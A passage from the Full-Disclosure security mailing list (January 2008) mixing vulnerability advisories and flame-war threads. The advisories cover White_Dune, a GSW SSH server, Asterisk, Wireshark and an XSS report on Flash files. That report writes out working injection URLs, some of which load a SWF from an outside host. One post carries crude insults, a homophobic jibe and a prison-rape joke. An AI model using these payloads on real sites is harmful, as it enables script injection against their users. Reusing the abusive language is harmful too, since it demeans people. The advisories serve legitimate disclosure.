> why SYS$FOO variables worked in VMS, and why they're so hard to get
> working
> correctly under Linux - they're *not* exactly the same as Unix/Linux
> environment variables, and as such provide both problems and solutions
> that
> environment variables don't).
>
> Bonus points for knowing that VMS was mostly written in Bliss/32 or some
> such,
> and VM and MVS were a mixture of assembler and (later on) PL/S.  No C
> knowledge
> needed for those critters...
>
> Even when the system *is* written in C, you don't need to be a C guru to
> understand what's going on. Maurice Bach's "The Design of the Unix
> Operating
> System" is probably one of the classic texts - but you don't need to know
> C any
> better than "read C code snippet as pseudocode" to follow it.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

[reepex]

its funny how you always talk about other people ( like a few days ago when
you were amazed that people exploited an off by one ), and talk about "the
old times"... sure signs of someone washed up as evident by your
non-productiveness in the last few years ( and no - spamming mailing lists
does not count )

On Jan 2, 2008 1:32 PM, <[EMAIL PROTECTED]> wrote:

> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..
>
> > Security relevance: UNHACKABLE! 
>
> WANK! (The old-timers will know what that means, and it's not what you
> newbies
> think... ;)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Buffer-overflow and format string in White_Dune 0.29beta791

[Luigi Auriemma]

###

 Luigi Auriemma

Application:  White_Dune
  http://vrml.cip.ica.uni-stuttgart.de/dune/
Versions: <= 0.29beta791
Platforms:Unix/Linux/MacOSX and Windows
Bugs: A] buffer-overflow in Scene::errorf
  B] format string in ImportFile
Exploitation: local
Date: 02 Jan 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


White_Dune is an open source editor/viewer for the VRML97 files.


###

===
2) Bugs
===

---
A] buffer-overflow in Scene::errorf
---

A buffer-overflow vulnerability is located in the function which builds
the error messages for the problems happened during the parsing of the
WRL file.

>From Scene.cpp:

void
Scene::errorf(const char *fmt, ...)
{
va_list ap;
char buf[1024], buf2[1024];
const char *url = "";  

va_start(ap, fmt);
vsprintf(buf, fmt, ap);
if (TheApp->getImportURL() != NULL)
url = TheApp->getImportURL();
mysnprintf(buf2, 1024, "%s %d: %s", url, lineno, buf);
_compileErrors += buf2;
}


--
B] format string in ImportFile
--

Another problem related to the handling of the errors.
After the building of the error message the parse() function returns
immediately and swDebugf() is called for visualizing it to stderr or to
the debugger without using the needed format argument required by the
function.

>From DuneApp.cpp:

DuneApp::ImportFile(const char *openpath, Scene* scene, bool protoLibrary,
Node *node, int field)
...
if (errors[0]) {
swMessageBox(_mainWnd, errors, "Parse Errors", SW_MB_OK, SW_MB_WARNING);
swDebugf(errors);
...


###

===
3) The Code
===


http://aluigi.org/poc/whitedunboffs.zip


###

==
4) Fix
==


Version 0.29beta795


###


--- 
Luigi Auriemma
http://aluigi.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Multiple vulnerabilities in Georgia SoftWorks SSH2 Server 7.01.0003

[Luigi Auriemma]

###

 Luigi Auriemma

Application:  Georgia SoftWorks SSH2 Server (GSW_SSHD)
  http://www.georgiasoftworks.com/prod_ssh2/ssh2_server.htm
Versions: <= 7.01.0003
Platforms:Windows
Bugs: A] format string in the log function
  B] buffer-overflow in the log function
  C] buffer-overflow in the handling of the password
Exploitation: remote
Date: 02 Jan 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


GSW_SSHD is a well known commercial SSH server which acts as SSH tunnel
for the telnet server GS_Tnet.exe.


###

===
2) Bugs
===


A] format string in the log function


The logging function used by the server is affected by a format string
vulnerability caused by the usage of vsprintf for building the first
message (like "LoginPassword(%s(%s)[%u])") and the usage of another
vsprintf for building the final log entry.
The bug can be exploitable through the username field.


--
B] buffer-overflow in the log function
--

A buffer-overflow vulnerability is located in the same logging
function.
It's enough to use an username longer than 1 chars to exploit the
vulnerability.


--
C] buffer-overflow in the handling of the password
--

The server is affected also by another buffer-overflow this time
located in the instructions which handle the password supplied by the
client exploitable through a string longer than 800 chars.


###

===
3) The Code
===


http://aluigi.org/poc/gswsshit.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

[Tremaine Lea]

Regardless of whether your intentions are good or not in performing
these reviews, one thing is crystal clear.  In order to perform these
reviews and have them accepted by those who would actually read and
depend on them to a degree, you need to have established yourself as a
credible source and have a good reputation.

With that in mind, I think the vast majority will continue to rely on
word of mouth from peers, or well respected and long standing
companies such as Gartner or even Dark Reading.  In my not so humble
opinion, you will not establish yourself as a credible resource by
engaging in petty disputes and mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an
attempt to drive interest to your blog.  I don't believe any serious
company would engage in the behaviour you have to date, so both your
motives and your method are in question.  If you genuinely wish to be
taken seriously and treated as a credible source of information about
other security vendors, I'd consider starting again from scratch and
develop a better method of attracting professional interest.  The key
is to attract the attention, not try and push your product down
throats.

Another quick lesson : if a vendor doesn't provide you with
information, the correct thing to do is simply note that you were
unable to review their product or services, and why.  To still attempt
a review with seriously incomplete information and then give a low
score is irresponsible at best.

-- 
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview <[EMAIL PROTECTED]> wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to
> everyone.
>
> We would be more than happy to give your company (QuietMove) a
> "better" review if you'd enable us to do that. So far you haven't
> helped us to effectively review you at all. We tried to call you
> before our initial review, but never got hold of anyone. We also
> sent you an email before writing our second review, and you never
> responded to any of the questions in that email. If you'd like us
> to do a better review then provide us with the information that you
> think we will need to get the job done.
>
> Our current review is the product of your website, emails that
> you've posted to this and other forums, and your reaction to our
> first review. We haven't been able to find anything related to
> major accomplishments by you or by QuietMove, we haven't seen any
> sample reports, and we haven't received any answers to any
> questions about your methodologies for service execution and
> delivery. We even think that our current review might be too harsh,
> but can't change anything without more information.
>
> If you want us to change our review, we can do that again and we
> can do it in a non-biased way (regardless of all the rants and
> noise). We need you to tell us about your service delivery
> methodologies, your reporting methodologies, how you define
> specific service offerings, what markets you play in, and if
> possible sanitized sample reports. We won't publish any of that
> information directly, but we would use that to produce your next
> review.
>
> We want our reviews to accurately and truthfully reflect the
> quality and professionalism of the providers that we study. (In
> fact, if anyone has any suggestions as to how we could better
> "rank" security companies we'd be more than happy to listen and
> consider those suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless
> you request a redo of the current review. We will only redo the
> review if you are able to provide us with accurate information to
> help us get it done. We think that you should do it, because we
> think that you can score much better than an F+. (You're clearly
> not an idiot and you do have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
>   The Secreview Team
>   http://secreview.blogspot.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

[Nate McFeters]

Is anyone out there using these reviews?  It's just amazing that we are
still going through this.  SecReview is busting Adam for not credentializing
himself, but I see nothing of how they have credentialized what they are
doing.  It's absurd.

On 1/2/08, Tremaine Lea <[EMAIL PROTECTED]> wrote:
>
> Regardless of whether your intentions are good or not in performing
> these reviews, one thing is crystal clear.  In order to perform these
> reviews and have them accepted by those who would actually read and
> depend on them to a degree, you need to have established yourself as a
> credible source and have a good reputation.
>
> With that in mind, I think the vast majority will continue to rely on
> word of mouth from peers, or well respected and long standing
> companies such as Gartner or even Dark Reading.  In my not so humble
> opinion, you will not establish yourself as a credible resource by
> engaging in petty disputes and mud slinging on FD.
>
> Worse, it becomes more and more apparent that this is essentially an
> attempt to drive interest to your blog.  I don't believe any serious
> company would engage in the behaviour you have to date, so both your
> motives and your method are in question.  If you genuinely wish to be
> taken seriously and treated as a credible source of information about
> other security vendors, I'd consider starting again from scratch and
> develop a better method of attracting professional interest.  The key
> is to attract the attention, not try and push your product down
> throats.
>
> Another quick lesson : if a vendor doesn't provide you with
> information, the correct thing to do is simply note that you were
> unable to review their product or services, and why.  To still attempt
> a review with seriously incomplete information and then give a low
> score is irresponsible at best.
>
> --
> Tremaine Lea
> Network Security Consultant
> Intrepid ACL
> "Paranoia for hire"
>
> On Jan 2, 2008 11:08 AM, SecReview <[EMAIL PROTECTED]> wrote:
> > Hi Adam,
> >
> > We've said this before and will say this again, this time to
> > everyone.
> >
> > We would be more than happy to give your company (QuietMove) a
> > "better" review if you'd enable us to do that. So far you haven't
> > helped us to effectively review you at all. We tried to call you
> > before our initial review, but never got hold of anyone. We also
> > sent you an email before writing our second review, and you never
> > responded to any of the questions in that email. If you'd like us
> > to do a better review then provide us with the information that you
> > think we will need to get the job done.
> >
> > Our current review is the product of your website, emails that
> > you've posted to this and other forums, and your reaction to our
> > first review. We haven't been able to find anything related to
> > major accomplishments by you or by QuietMove, we haven't seen any
> > sample reports, and we haven't received any answers to any
> > questions about your methodologies for service execution and
> > delivery. We even think that our current review might be too harsh,
> > but can't change anything without more information.
> >
> > If you want us to change our review, we can do that again and we
> > can do it in a non-biased way (regardless of all the rants and
> > noise). We need you to tell us about your service delivery
> > methodologies, your reporting methodologies, how you define
> > specific service offerings, what markets you play in, and if
> > possible sanitized sample reports. We won't publish any of that
> > information directly, but we would use that to produce your next
> > review.
> >
> > We want our reviews to accurately and truthfully reflect the
> > quality and professionalism of the providers that we study. (In
> > fact, if anyone has any suggestions as to how we could better
> > "rank" security companies we'd be more than happy to listen and
> > consider those suggestions.)
> >
> > Hope this helps. This will be our last email about QuietMove unless
> > you request a redo of the current review. We will only redo the
> > review if you are able to provide us with accurate information to
> > help us get it done. We think that you should do it, because we
> > think that you can score much better than an F+. (You're clearly
> > not an idiot and you do have at least some experience.)
> >
> > -the end.
> >
> >
> >
> >
> > Regards,
> >   The Secreview Team
> >   http://secreview.blogspot.com
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Uber Lamer Ass of the Year. Vote!

[worried security]

On Dec 24, 2007 4:59 AM, damncon <[EMAIL PROTECTED]> wrote:
>  I'm still wondering which are n3td3v main skills, and I am not
> joking, I have only seen him posting links to goverment news, security
> news, etc.
>
> What does really happens in n3td3v user group or whatever is it called.

We talk about things your mom wouldn't approve of and i'm not letting
you sign up, na na na.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

[Valdis . Kletnieks]

On Wed, 02 Jan 2008 13:48:13 CST, you said:

> its funny how you always talk about other people ( like a few days ago when
> you were amazed that people exploited an off by one ),

Actually, I was merely pointing out to a reader of the list that if you *can*
get x'41414141' into the appropriate register, you can probably abuse it into a
full exploit, and gave an example of an off-by-one-byte that produced such an
exploit.  Maybe in that reader's world, they can get away with asking "how is
that exploitable?", but some of us have to classify that as "should be
considered exploitable until proved otherwise".

>, and talk about "the
> old times"... sure signs of someone washed up as evident by your
> non-productiveness in the last few years

Failure to learn from the lessons of the past is a good way to shoot yourself
in the foot exactly the same way.  Yes - WANK was back in 1989.  However, even
now, almost 2 decades later, we're *still* seeing a lot of systems getting
exploited for the *exact same* base cause.

Additionally, it's proof that anybody who is just *now* waking up to the
concept of "cyber-warfare" is 20 years behind:

http://marc.info/?l=isn&m=100707930117213&w=2

It's also a good idea to keep in mind that not everybody in the security
industry measures "productivity" by "number of exploits published".  For some
of us who run production networkds, "no incidents happened, and none of the
users noticed a damned thing we did to ensure it" is the rarely attained
Nirvana.


pgplqBQCATEC5.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] AST-2008-001: Crash from transfer using BYE with Also header

[Asterisk Security Team]

Asterisk Project Security Advisory - AST-2008-001

++
|   Product   | Asterisk |
|-+--|
|   Summary   | Remote Crash Vulnerability in SIP channel driver |
|-+--|
| Nature of Advisory  | Denial of Service|
|-+--|
|   Susceptibility| Remote Unauthenticated Sessions  |
|-+--|
|  Severity   | Critical |
|-+--|
|   Exploits Known| No   |
|-+--|
| Reported On | December 26, 2007|
|-+--|
| Reported By | Grey VoIP (bugs.digium.com user greyvoip)|
|-+--|
|  Posted On  | January 2, 2008  |
|-+--|
|   Last Updated On   | January 2, 2008  |
|-+--|
|  Advisory Contact   | Joshua Colp <[EMAIL PROTECTED]>   |
|-+--|
|  CVE Name   |  |
++

++
| Description | The handling of the BYE with Also transfer method was|
| | broken during the development of Asterisk 1.4. If a  |
| | transfer attempt is made using this method the system|
| | will immediately crash upon handling the BYE message due |
| | to trying to copy data into a NULL pointer. It is|
| | important to note that a dialog must have already been   |
| | established and up in order for this to happen.  |
++

++
| Resolution | A fix has been added so that the BYE with Also transfer   |
|| method now properly allocates and uses the transfer data  |
|| structure. It will no longer try to copy data into a NULL |
|| pointer and will operate properly.|
++

++
|   Affected Versions|
||
|  Product   |   Release   | |
||   Series| |
|+-+-|
|Asterisk Open Source|1.0.x| Unaffected  |
|+-+-|
|Asterisk Open Source|1.2.x| Unaffected  |
|+-+-|
|Asterisk Open Source|1.4.x| All versions prior to   |
|| | 1.4.17  |
|+-+-|
| Asterisk Business Edition  |A.x.x| Unaffected  |
|+-+-|
| Asterisk Business Edition  |B.x.x| Unaffected  |
|+-+-|
| Asterisk Business Edition  |C.x.x| All versions prior to   |
|| | C.1.0-beta8 |
|+-+-|
|AsteriskNOW | pre-release | All versions prior to beta7 |
|+-+-|
| Asterisk Appliance  

[Full-disclosure] January 4th Chicago 2600 Meeting Information

[Steven McGrath]

The January Chicago 2600/DefCon 312 Meeting is near! The meeting
will be Friday,
January 4th at the Neighborhood Boys and Girls Club and will feature
much of the same usual fun that all of you have grown to expect!


REQUIREMENTS:
* Laptop (Mac/Linux/Windows) capable of running VMWare
OR
* Laptop with full Ruby on Rails and ruby-sqllite3 installed.


[Presentation Information]
- 9:00pm - Distributed Nmap: How to Automate Scans for an Environment
- Tentative - Jax By Jaku
- After hours - Wii, Music, Socializing, etc.

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, January 4th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Critical Vulnerability in [Full-Disclosure]

[31415926]

Critical Vulnerability in [Full-Disclosure]

The problem with full disclosure is that everyone feels the need to 
fully disclose, even when their opinion and the information they 
are purporting to impart is, well, bollocks. You can't tell them to 
shut up as they think they're important and the internet gives them 
balls of steel and verbal diarhoea, so we stumble from one tired 
flamewar to another with no useful content being published.

It's embarrassing.

I'm an advocate of FD as a concept. I believe that there is no such 
thing as an innocent on the internet and if you really are that 
dumb, then you deserve everything you get. FD (as one of many like-
minded lists) forces the vendors to patch or die and eventually 
write quality code. FD (the concept, not the list) is the ultimate 
nuclear deterrent, without the mutually assured destruction lunacy.

I have watched the posters to this list for some time. By far the 
vast majority are transparently kiddies, sitting on their painted-
up laptops thinking of themselves as the techno-brats in the film 
"Hackers" and hoping to grow up to be like the guy in the film 
"Swordfish". They write in l33t5p34k and think that this somehow 
makes them informed. Kiddies are the lowest form of life in the 
hierarchy of information security and in the IT industry generally.

You know who you are and so does everyone else. You are fools, and 
an embarrassment to the craft:
Secreview (review of products/services you have never bought, are 
you the goatse.cz receiver?)
Reepex (Isn't a reepex a bit of farm machinery?)
Gobbles (A nickname for a gay male prostitute)
Morning Wood (The holy grail of the viagra-abuser)
Gmaggro ("high value target selection", are you completely cocking 
stupid?)

Oh, the outrage.

I can see it now. there will be armies of skiddies demanding that 
the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory 
messages concerning her skills and possible employment 
opportunities for her and her mother everywhere possible. Guess 
what, kids? I don't care.

No, not even a little bit. Do what you like, I could care less and 
no one else cares if you live or die tonight, you sad, acne'd 
little dewdrops.

Calmed down yet?

Good. I want you to consider something.

The FD list consists of the following content (and what it has to 
say):

Advisories by vendors (we fixed this)
Advisories by individuals (I tested that and found this)
Advisories by infosec organisations (we found this)
Funnies (self explanatory)
Opinions (this sucks, what about that?)
Skids (I did this, aren't I great, everyone else sucks?)
Trolls (you suck)
Trawlers (I have something 0day to buy or sell)

The top three (ie the useful content) is available in any one of a 
hundred places, the bottom three are noise. The only people 
interested in the noise are those who keep track of it for a 
living.

So, consider that by posting anything in the bottom three 
categories, you are drawing the attention of those who take an 
interest in your sad efforts to destabilise the technical crutch of 
society. These people are better than you in every important way, 
and if you so much as tiptoe across one of their lines, you'll wind 
up sharing a cell with a 7ft gorilla called george with a dead 
mouse and a pressing need to dry-cornhole your ringpiece 3 times a 
night and twice on sundays. Do yourselves a favour and STFU.

What's left?

The funnies and the opinions. I've laughed my tits off at posts by 
Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and i've 
been interested by a few others who will remain nameless as I can't 
list them all. Long live full disclosure, but keep in mind that 
you're only legends in your own bedrooms.

later, pi

--
Click to get a free auto insurance quotes from top companies.
http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS Vulnerabilities in Common Shockwave Flash Files

[rich cannings]

Hi.

Recently, there has been news regarding Flash authoring tools and XSS,
but the articles contained little technical information. So, I created
a detailed report at:

http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw

An abbreviated version intended for full-disclosure, bugtraq, and
websecurity lists is below.


SUMMARY

Critical vulnerabilities exist in a large number of widely used web
authoring tools that automatically generate Shockwave Flash (SWF)
files, such as Adobe (r) Dreamweaver (r), Adobe Acrobat (r) Connect
(tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and
Techsmith Camtasia. The flaws render websites that host these
generated SWF files vulnerable to Cross-Site Scripting (XSS).

This problem is not limited to authoring tools. Autodemo, a popular
service provider, used a vulnerable controller SWF in many of their
projects.

Simple Google hacking queries reveal that hundreds of thousands of
SWFs are vulnerable on the Internet, and a considerable percentage of
major Internet sites are affected. We are only reporting XSS
vulnerabilities that have been fixed by the vendors.


THE PROBLEM

Many web authoring tools that automatically generate SWFs insert
identical and vulnerable ActionScript into all saved SWFs or necessary
controller SWFs (think of tools that "save as SWF", "export to SWF",
etc.). The vulnerable ActionScript can used by attackers to execute
arbitrary JavaScript in the security domain of the website hosting the
SWF.

We were unable to perform an exhaustive review of all authoring tools
that generate SWFs. More XSS issues may exist in the products listed
below and certainly exist in other applications that save to SWF.

We are only reporting XSS vulnerabilities that have been fixed by the
vendors. There are more products vulnerable. We will publish more
information when the vendor releases fixes.

Adobe Dreamweaver

The "skinName" parameter is accepted by all Flash files produced by
the "Insert Flash Video" feature. "skinName" can be used to force
victims to load of arbitrary URLs including the "asfunction" protocol
handler:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on August 8, 2007. This issue was fixed in the
December Flash player release.

Adobe Acrobat Connect/Macromedia Dreamweaver

"main.swf" is the controller file in all Connect/Breeze online
presentations. This SWF does not properly validate the "baseurl"
parameter; thus causing script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on July 31, 2007. This issue was fixed in the
December Flash player release.

InfoSoft FusionCharts

One of the issues found in FusionCharts was that the "dataURL"
parameter allows insertion of arbitrary HTML into a "TextArea"
instance. This allows attackers to load SWFs from other domains:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we
found were released in late September. Webmasters should consult
InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia

One of the issues found in Camtasia was that the "csPreloader"
parameter loads an arbitrary flash file:

http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues was
released late September. Webmasters should contact Techsmith to
properly upgrade their SWFs. See "The Fix" for details.

Autodemo

Autodemo is a service provider, not an authoring tool. However, like
authoring tools they use a common control file in many demos. The
"onend" parameter in "control.swf" loads arbitrary URLs including the
JavaScript protocol handler:

http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely
responsive to our report and quickly fixed the issue in early
September. Webmasters must update to the latest "control.swf". See
"The Fix" for details.

Autodemo is not the only service provider to have XSS in their
products. They are just the only service provider we looked at.
Readers should be  concerned about other service providers who don't
even know their SWFs are vulnerable.


THE FIX

See http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw.


CREDITS

First and foremost, we thank Stafano Di Paola of Minded Security and
Obscure of EyeonSecurity who thoroughly researched and pioneered every
attack we used.

Thanks to Autodemo, Infosoft, and Techsmith for quickly fixing this
issue. We also thank the Computer Emergency Response Team for
coordinating with the vendors to fix this issue, the Adobe Flash
player development teams for including some fixes in the player (we
hope to see more in the future), the Adobe Software Security
Engineering Team

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

[Lyal Collins]

I'd add to this that anyone who buys security consulting/pen test services
et al solely on the basis of web site content is unlikely to get any
worthwhile outcomes for their specific needs. 

No effective manager in any company/government I've seen is going to refer
to a web site alone, or to bother finding obscure posts on a specialist
mailing list that may or may not be relevant to their needs - they merely
use web sites as a source of potential suppliers before interviewing them,
and getting references.

Let kill this pointless waste on inbox space, please.
lyalc


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Tremaine Lea
Sent: Thursday, 3 January 2008 6:05 AM
To: SecReview
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)


Regardless of whether your intentions are good or not in performing these
reviews, one thing is crystal clear.  In order to perform these reviews and
have them accepted by those who would actually read and depend on them to a
degree, you need to have established yourself as a credible source and have
a good reputation.

With that in mind, I think the vast majority will continue to rely on word
of mouth from peers, or well respected and long standing companies such as
Gartner or even Dark Reading.  In my not so humble opinion, you will not
establish yourself as a credible resource by engaging in petty disputes and
mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an attempt
to drive interest to your blog.  I don't believe any serious company would
engage in the behaviour you have to date, so both your motives and your
method are in question.  If you genuinely wish to be taken seriously and
treated as a credible source of information about other security vendors,
I'd consider starting again from scratch and develop a better method of
attracting professional interest.  The key is to attract the attention, not
try and push your product down throats.

Another quick lesson : if a vendor doesn't provide you with information, the
correct thing to do is simply note that you were unable to review their
product or services, and why.  To still attempt a review with seriously
incomplete information and then give a low score is irresponsible at best.

-- 
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview <[EMAIL PROTECTED]> wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to everyone.
>
> We would be more than happy to give your company (QuietMove) a 
> "better" review if you'd enable us to do that. So far you haven't 
> helped us to effectively review you at all. We tried to call you 
> before our initial review, but never got hold of anyone. We also sent 
> you an email before writing our second review, and you never responded 
> to any of the questions in that email. If you'd like us to do a better 
> review then provide us with the information that you think we will 
> need to get the job done.
>
> Our current review is the product of your website, emails that you've 
> posted to this and other forums, and your reaction to our first 
> review. We haven't been able to find anything related to major 
> accomplishments by you or by QuietMove, we haven't seen any sample 
> reports, and we haven't received any answers to any questions about 
> your methodologies for service execution and delivery. We even think 
> that our current review might be too harsh, but can't change anything 
> without more information.
>
> If you want us to change our review, we can do that again and we can 
> do it in a non-biased way (regardless of all the rants and noise). We 
> need you to tell us about your service delivery methodologies, your 
> reporting methodologies, how you define specific service offerings, 
> what markets you play in, and if possible sanitized sample reports. We 
> won't publish any of that information directly, but we would use that 
> to produce your next review.
>
> We want our reviews to accurately and truthfully reflect the quality 
> and professionalism of the providers that we study. (In fact, if 
> anyone has any suggestions as to how we could better "rank" security 
> companies we'd be more than happy to listen and consider those 
> suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless 
> you request a redo of the current review. We will only redo the review 
> if you are able to provide us with accurate information to help us get 
> it done. We think that you should do it, because we think that you can 
> score much better than an F+. (You're clearly not an idiot and you do 
> have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
>   The Secreview Team
>   http://secreview.blogspot.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/f

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

[Line Noise]

On Jan 2, 2008 11:32 AM,  <[EMAIL PROTECTED]> wrote:
> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..

VMS was a fine and elegant system, written in Bliss, Coral, and
Pascal. Yes, indeed, my children. Pascal. Much of the C code currently
in OpenVMS replaces the Coral and Pascal. The Bliss is still about the
same ratio. Mmmm, Bliss32. Good memories, thanks.

-- 
It's Full Disclosure.
Post the disclosure here, not on your website.
You may not have a web site tomorrow.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2008:1 ] - Updated wireshark packages fix multiple vulnerabilities

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDVSA-2008:1
 http://www.mandriva.com/security/
 ___
 
 Package : wireshark
 Date: January 2, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A number of vulnerabilities in the Wireshark program were found that
 could cause crashes, excessive looping, or arbitrary code execution.
 
 This update rovides Wireshark 0.99.7 which is not vulnerable to
 these issues.
 
 An updated version of libsmi is also being provided, not because
 of security issues, but because this version of wireshark uses it
 instead of net-snmp for SNMP support.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451
 http://www.wireshark.org/security/wnpa-sec-2007-03.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 3b8e9077915d6d2b26334de8d2f845fe  
2007.0/i586/libsmi-mibs-ext-0.4.5-2.2mdv2007.0.i586.rpm
 dbe6a64db1d2fccb573a3e3f67f973f8  
2007.0/i586/libsmi-mibs-std-0.4.5-2.2mdv2007.0.i586.rpm
 87d655b543be31d5ae0f58a8dbf97027  
2007.0/i586/libsmi2-0.4.5-2.2mdv2007.0.i586.rpm
 4ff75e902911eb3ff3fdf307220ca62d  
2007.0/i586/libsmi2-devel-0.4.5-2.2mdv2007.0.i586.rpm
 49765d2627d5d361fea25034a7cffdb3  
2007.0/i586/libwireshark0-0.99.7-0.1mdv2007.0.i586.rpm
 0a01841128e59b2f7d176294017c6763  
2007.0/i586/smi-tools-0.4.5-2.2mdv2007.0.i586.rpm
 8aa19bb4d1e9117ca49513cc59029796  
2007.0/i586/tshark-0.99.7-0.1mdv2007.0.i586.rpm
